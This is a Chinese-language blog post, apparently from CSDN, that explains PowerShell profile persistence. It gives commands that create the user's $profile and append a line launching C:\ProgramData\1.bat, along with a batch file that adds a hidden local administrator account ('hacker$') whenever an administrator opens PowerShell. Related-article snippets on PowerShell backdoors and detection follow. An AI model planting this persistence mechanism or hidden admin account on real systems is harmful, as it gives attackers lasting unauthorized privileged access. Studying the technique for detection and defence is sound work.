PowerShell配置文件后门

最新推荐文章于 2025-06-07 06:55:34 发布

s1y1n9aI

最新推荐文章于 2025-06-07 06:55:34 发布

阅读量1.2k

点赞数

CC 4.0 BY-SA版权

分类专栏：权限维持文章标签：安全服务器

本文链接：https://blog.csdn.net/qq_43626025/article/details/122018728

权限维持专栏收录该内容

7 篇文章

订阅专栏

本文介绍了一种通过滥用PowerShell配置文件实现持久化的攻击手段。攻击者可通过修改配置文件加入恶意命令，在用户启动PowerShell时执行特定脚本，进而获取系统权限。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

PowerShell 配置文件是在 PowerShell 启动时运行的脚本。
在某些情况下，攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件，以包括任意命令，功能，模块和/或PowerShell驱动器来获得持久性。

案例

echo $profile  
Test-path $profile  # 结果返回false，表示没有该文件
New-Item –Path $Profile –Type File –Force   # 强制创建一个

$string = 'Start-Process "C:\ProgramData\1.bat"'
$string | Out-File -FilePath $profile -Append   # 把变量$string内容写入到配置文件
more $profile

1.bat

net user hacker$ 123456 /add && net localgroup administrators hacker$ /add

运维人员只要打开powershell，就会执行`1.bat`脚本。

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

s1y1n9aI

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树（AST）提取

杨秀璋的专栏

03-11

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树（AST）提取。希望这篇文章对您有帮助，也推荐大家去阅读论文，且看且珍惜。

powershell渗透基础

qq_46804551的博客

04-30

1387

一旦攻击者可以在一台计算机上运行代码，就会下载powershell脚本文件(.ps1)到磁盘中执行，甚至无需写到磁盘中执行，它可以直接在内存中运行，利用诸多特点攻击者可以持续攻击而不被轻易发现。常用的powershell攻击工具有以下几种： powerSploit: 常用于信息探测，权限提升，凭证窃取，持久化等操作 Nishang: 基于powershell的渗透测试专用工具，集成了框架，脚本和各种payload，包含下载和执行，键盘记录，DNS，延时命令等脚本 Empire: 基于powe

参与评论您还未登录，请先登录后发表或查看评论

权限维持——powershell配置文件后门

mingyqf的博客

02-18

889

0x05 powershell配置文件后门 Powershell配置文件其实就是一个powershell脚本，他可以在每次运行powershell的时候自动运行，所以可以通过向该文件写入自定义的语句用来长期维持权限。依次输入以下命令，查看当前是否存在配置文件。 echo $profile Test-path $profile 如果返回false则需要创建一个 New-Item -Path $profile -Type File –Force 然后写入命令，这里我以创建一个用户为目标，也可以写成反弹s

PowerShell 配置文件后门

jijisaq的博客

05-18

1594

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！)，现在星球有近150+位师傅相信并选择加入我们，圈子每天都会更新内容，老用户可永久享受初始加入价格，圈子内容持续更新中。变量的值发生更改，因此请确保在所使用的每个 PowerShell 主机应用程序中显示配置文件变量的值。自动变量存储当前会话中可用的 PowerShell 配置文件的路径。变量存储“当前用户，当前主机”配置文件的路径。

Windows配置PowerShell的初始化启动文件（初始化oh-my-posh和conda）

最新发布

hfhfn的博客

06-07

556

摘要：本文解决PowerShell中两个常见问题：1) oh-my-posh激活需在配置文件中添加初始化命令，若无效可使用绝对路径指向安装目录执行；2) miniconda3环境激活需在profile.ps1文件（Microsoft Store版为Microsoft.PowerShell_profile.ps1）中写入conda初始化配置。解决方案是将两部分配置（oh-my-posh主题设置和conda shell hook）合并写入对应配置文件，保存后重启PowerShell即可同时生效。特别注意不同安装

PowerShell中的配置文件

weixin_34343000的博客

03-19

351

http://www.cnblogs.com/ceachy/archive/2013/03/01/PowerShell_Profile.html

powershell创建并加载配置文件

weixin_33872660的博客

05-20

906

$pshome ：powershell的主目录 $profile ：显示 Windows PowerShell 配置文件的路径 test-path $profile ：确定是否已经在系统上创建了 Windows PowerShell 配置文件 powershell.exe 主机配置文件（在 Windows Vista 中）的位置如下所示：%windir%\system32\WindowsP...

Windows PowerShell 添加新配置文件（打开对应的目录，并执行命令）

徐同保的专栏

07-02

558

Windows PowerShell 添加新配置文件（打开对应的目录，并执行命令）

自定义您的PowerShell配置文件

culunxun2863的博客

09-23

2201

For frequent PowerShell users, the standard settings might not be ideal. We can change the settings of our PowerShell window to how we like it by modifying the profile. 对于经常使用PowerShell的用户，标准设置可能不是理想...

掌握反向PowerShell：实施TCP命令接收的持久后门技术

client.ps1脚本被托管在攻击者选择的位置，用于下载并执行install.bat，从而安装一个持久的PowerShell后门。攻击者运行server.ps1后，就可以向受害者获取一个反向PowerShell提示。" 在详细解释这个过程之前，我们...

掌握后开发：精选PowerShell脚本与模块

3. 强化配置：通过组策略和PowerShell的配置文件（如ExecutionPolicy）限制可疑活动。 4. 定期更新：保持操作系统和安全软件的更新，以减少潜在的漏洞。 5. 安全意识培训：对IT人员和用户进行安全意识培训，教育他们...

powershell_配置文件与脚本编写(模板字符串插值/运算符与表达式/函数参数/控制流)(by offical)

xuchaoxin1375的博客

11-08

2012

文章目录获取对象属性插值简单值:`$`较复杂值:`$()`参数参数声明(basic)分配类型:参数说明(with `parameter[]`) link 获取对象属性 <object> | select-object * 例如 $Profile | Select-Object * 插值在双引号中可以插值简单值:$<expression> 较复杂值:$(<complex expression>) 插值可以嵌套! eg. Write-Host "Created bac

Powershell之MOF后门

weixin_34167043的博客

03-08

2009

Evi1cg · 2016/01/25 10:300x00 MOFManaged Object Format (MOF)是WMI数据库中类和类实例的原始保存形式。具体介绍可以阅读《WMI 的攻击，防御与取证分析技术之防御篇》，Windows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件：方法 1：使用Mofcomp.exe。方法 2：使用 IMof...

Windows PowerShell 配置文件

weixin_34029680的博客

03-30

636

添加别名、函数和变量时，实际上仅是在将它们添加到当前的 Windows PowerShell 会话中。如果退出会话或者关闭 Windows PowerShell，则更改将丢失。若要保留这些更改，可以创建 Windows PowerShell 配置文件，然后将别名、函数和变量添加到配置文件。每次启动 Windows PowerShell 时，都会加载该配置文件。若要加载...

Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持

Longwaer

01-10

2007

通过学习掌握Windows权限维持小技巧，更好的运行相关知识点来进行权限维持，更快知晓权限维持的作用。

APT35 启用了新 PowerShell 后门

老司机的后备箱

07-27

225

近日，研究人员发现 Phosphorus（又名 CharmingKitten、APT35）组织的攻击行动有所增长。业界多次发现该组织对各行各业机构或人士发起攻击，甚至干预美国总统选举。Cybereason 的研究人员最近发现 APT35 使用了名为PowerLess的新型 PowerShell 后门。该后门通过在 .NET上下文中直接运行而非生成 PowerShell 进程来规避 PowerShell 安全检测。在攻击行动中使用的新工具集并不止新的 PowerShell。

如何创建PowerShell配置文件

culingluan4376的博客

09-18

1516

PowerShell is a great way to automate almost anything in Windows. However, its not just a scripting language. If you find yourself using it as a command line shell it may be useful to store your funct...